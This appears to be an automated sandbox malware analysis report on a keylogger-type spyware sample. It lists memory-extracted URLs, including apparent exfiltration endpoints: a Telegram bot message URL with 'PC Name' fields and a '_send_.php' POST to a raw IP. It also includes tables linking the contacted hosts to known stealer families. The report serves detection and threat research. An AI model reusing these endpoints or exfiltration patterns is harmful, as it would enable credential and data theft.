                                                                          https://ocsp.quovadisoffshore.com0svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://reallyfreegeoip.org/xml/svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://www.office.com/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://secure.eicar.org/eicar.comsvchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exesvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://packetstormsecurity.com/files/download/22459/BIOS320.EXEsvchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://secure.eicar.org/eicar.com.txt/svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://www.google.com/search?q=eicarsvchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://secure.eicar.org/eicar.com/svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://secure.eicar.org/eicar.com.svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://aborters.duckdns.org:8081svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.autoitscript.com/site/autoit/downloads/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.eicar.org/download-anti-malware-testfile/Downloadsvchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://www.eicar.org/download-anti-malware-testfile/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://packetstormsecurity.com/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://anotherarmy.dns.army:8081svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.eicar.org/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.office.com/lB5rsvchost.exe, 00000008.00000002.33970405843.00000000058F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://reallyfreegeoip.orgsvchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://reallyfreegeoip.org/xml/154.16.192.225$svchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000577D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.quovadis.bm0svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20asvchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlsvchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://www.google.com/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://secure.eicar.org/eicar.com.txtsvchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs
IP               Domain               Country         ASN    ASN Name            Malicious
149.154.167.220  api.telegram.org     United Kingdom  62041  TELEGRAMRU          true
104.21.67.152    reallyfreegeoip.org  United States   13335  CLOUDFLARENETUS     true
158.101.44.242   checkip.dyndns.com   United States   31898  ORACLE-BMC-31898US  true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541369
Start date and time: 2024-10-24 18:33:49 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of new started processes analysed: 6
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: g1TLK7mbZD.img
Detection: MAL
Classification: mal100.troj.spyw.evad.winIMG@7/8@3/3
Cookbook Comments:
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): vhdmp.sys, dllhost.exe, fsdepends.sys
• Excluded domains from analysis (whitelisted): ecs.office.com, ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: g1TLK7mbZD.img
Time      Type             Description
12:35:55  API Interceptor  24x Sleep call for process: powershell.exe modified
12:36:02  API Interceptor  13985615x Sleep call for process: svchost.exe modified
Match            Associated Sample Name / URL              Detection  Threat Name
149.154.167.220  Purchase Order.exe                        malicious  MassLogger RAT
                 kQyd2z80gD.exe                            malicious  DCRat
                 REVISED INVOICE.exe                       malicious  GuLoader, Snake Keylogger
                 Produccion.exe                            malicious  GuLoader, Snake Keylogger
                 226999705-124613-sanlccjavap0004-67.exe   malicious  Snake Keylogger
                 BT-036016002U_RFQ 014-010-02024.exe       malicious  Snake Keylogger, VIP Keylogger
                 RFQ_64182MR_PDF.R00.vbs                   malicious  GuLoader, Snake Keylogger
                 Circular_no_088_Annexure_pdf.html         malicious  HTMLPhisher
                 RTGS_UCB_DCCB_docx.html                   malicious  HTMLPhisher
                 WBPWLAj09q.exe                            malicious  PureLog Stealer, Snake Keylogger, VIP Keylogger
104.21.67.152    Justificante de pago.exe                  malicious  GuLoader, Snake Keylogger
                 dg_official01.exe                         malicious  GuLoader
                 FedEx Shipping Confirmation.exe           malicious  GuLoader, Snake Keylogger
                 New Order.exe                             malicious  GuLoader, Snake Keylogger
                 HSBC Advice_ACH Credit.com.exe            malicious  GuLoader, Snake Keylogger
                 New Order.exe                             malicious  GuLoader, Snake Keylogger
                 Quotation No.VFLOIPS31052024-1_PDF.exe    malicious  GuLoader, Snake Keylogger, VIP Keylogger
                 Revised PI_2024.exe                       malicious  GuLoader, Snake Keylogger
                                                                                                                                                                              Order 8391-6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                Company Profile.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  158.101.44.242Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  PaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  SUAlTWPjKQ.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
checkip.dyndns.com | EKSTRE_1022.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | Purchase Order.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | Halkbank_Ekstre_20241022_081224_563756.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 132.226.247.73
checkip.dyndns.com | REVISED INVOICE.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | SIPARIS-290124.PDF.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 132.226.8.169
checkip.dyndns.com | Renommxterne.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | PAYMENT ADVISE MT107647545.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | Produccion.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | 080210232024.exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.247.73
checkip.dyndns.com | 226999705-124613-sanlccjavap0004-67.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.130.0
reallyfreegeoip.org | EKSTRE_1022.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
reallyfreegeoip.org | Purchase Order.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
reallyfreegeoip.org | Halkbank_Ekstre_20241022_081224_563756.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 188.114.96.3
reallyfreegeoip.org | REVISED INVOICE.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | SIPARIS-290124.PDF.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | Renommxterne.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | PAYMENT ADVISE MT107647545.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | Produccion.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | 080210232024.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
reallyfreegeoip.org | 226999705-124613-sanlccjavap0004-67.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.96.3
api.telegram.org | Purchase Order.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | kQyd2z80gD.exe | Get hash | malicious | DCRat | Browse | 149.154.167.220
api.telegram.org | REVISED INVOICE.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | Produccion.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | 226999705-124613-sanlccjavap0004-67.exe | Get hash | malicious | Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | BT-036016002U_RFQ 014-010-02024.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | RFQ_64182MR_PDF.R00.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | Circular_no_088_Annexure_pdf.html | Get hash | malicious | HTMLPhisher | Browse | 149.154.167.220
api.telegram.org | RTGS_UCB_DCCB_docx.html | Get hash | malicious | HTMLPhisher | Browse | 149.154.167.220
api.telegram.org | WBPWLAj09q.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | Purchase Order.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
TELEGRAMRU | kQyd2z80gD.exe | Get hash | malicious | DCRat | Browse | 149.154.167.220
TELEGRAMRU | REVISED INVOICE.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Produccion.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | 226999705-124613-sanlccjavap0004-67.exe | Get hash | malicious | Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | BT-036016002U_RFQ 014-010-02024.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | RFQ_64182MR_PDF.R00.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Circular_no_088_Annexure_pdf.html | Get hash | malicious | HTMLPhisher | Browse | 149.154.167.220
TELEGRAMRU | RTGS_UCB_DCCB_docx.html | Get hash | malicious | HTMLPhisher | Browse | 149.154.167.220
TELEGRAMRU | WBPWLAj09q.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
CLOUDFLARENETUS | EXTERNALRoger Moczygemba shared DIRECT MED CLINIC - CONFIDENTIAL with you.msg | Get hash | malicious | Unknown | Browse | 104.18.94.41
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 104.21.53.8
CLOUDFLARENETUS | https://na2.docusign.net/Signing/EmailStart.aspx?a=c6104538-ac3b-4407-b24b-a0b641ee4589&etti=24&acct=7853161b-6814-4528-85bc-ffe96cfca42f&er=09ab18a7-8de5-4c92-931d-cb9cd9f7b00d | Get hash | malicious | Unknown | Browse | 104.18.66.57
CLOUDFLARENETUS | https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL | Get hash | malicious | Unknown | Browse | 172.67.68.47
CLOUDFLARENETUS | http://hybrid-web.global.blackspider.com/urlwrap/?q=AXicLU67UsMwEFQBX0Gf0pbtkywxowHLiZgUDEXoGVmRjbFlJX4wk4bPgT-kJgpp9u72dnb35hZ9_SB0943Q2J8S1kTT-Bk53fbGD_Po-8h4h4C_yGb70WGgwAjaOz_q4TFAY41fhvk0mSXyY4Pe5_kw3cdxP3RRa-M8k0-72IqHZXZvRruDbptBrMLl7L5dnLAh60JMfhmNFbb3x0VfmFDBDrPYPO9Wtj--jtp0271IeaVxWlvNawq24rrmlPAKkyw3hGoetMLaNOFnloGugFFS1QmrM3IGAKg1DSLdBrM0veyzSMIsryXPOUnO_1-dYIUisgSKsdoknOWcZiBlmSvMVaZwLouSpIqRslBScsxYCkWZQUkobEByul4riRAivwj9ATUqckw&Z | Get hash | malicious | Unknown | Browse | 104.26.11.204
CLOUDFLARENETUS | https://1drv.ms/o/c/76471f3776916fd0/EomjtsItbi9Ag0bnzrJDx08BhxVWepFoAXrJFoYeR9IZ0A?e=5%3aEFCh5b&sharingv2=true&fromShare=true&at=9 | Get hash | malicious | Unknown | Browse | 104.21.56.85
CLOUDFLARENETUS | sadfwqefrqw3f.exe | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | SecuriteInfo.com.Heur.11787.148.exe | Get hash | malicious | LummaC | Browse | 172.67.194.239
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 172.67.206.204
CLOUDFLARENETUS | https://www.canva.com/design/DAGUUU-VdiI/DdL4Z-_loK4X7NMMbGGnJg/view?utm_content=DAGUUU-VdiI&utm_campaign=designshare&utm_medium=link&utm_source=editor | Get hash | malicious | Unknown | Browse | 104.16.103.112
ORACLE-BMC-31898US | EKSTRE_1022.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
ORACLE-BMC-31898US | Purchase Order.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
ORACLE-BMC-31898US | REVISED INVOICE.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.130.0
ORACLE-BMC-31898US | botnet.spc.elf | Get hash | malicious | Mirai, Moobot | Browse | 140.238.98.34
ORACLE-BMC-31898US | Renommxterne.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 158.101.44.242
ORACLE-BMC-31898US | PAYMENT ADVISE MT107647545.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.6.168
ORACLE-BMC-31898US | 226999705-124613-sanlccjavap0004-67.exe | Get hash | malicious | Snake Keylogger | Browse | 193.122.130.0
ORACLE-BMC-31898US | BT-036016002U_RFQ 014-010-02024.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
ORACLE-BMC-31898US | RFQ_64182MR_PDF.R00.vbs | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 193.123.253.227
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adEKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://na2.docusign.net/Signing/EmailStart.aspx?a=c6104538-ac3b-4407-b24b-a0b641ee4589&etti=24&acct=7853161b-6814-4528-85bc-ffe96cfca42f&er=09ab18a7-8de5-4c92-931d-cb9cd9f7b00dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Kostenvoranschlag.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Szacunek IMP29575 za eksport z ostatniego kwartalu.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  xVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  No context
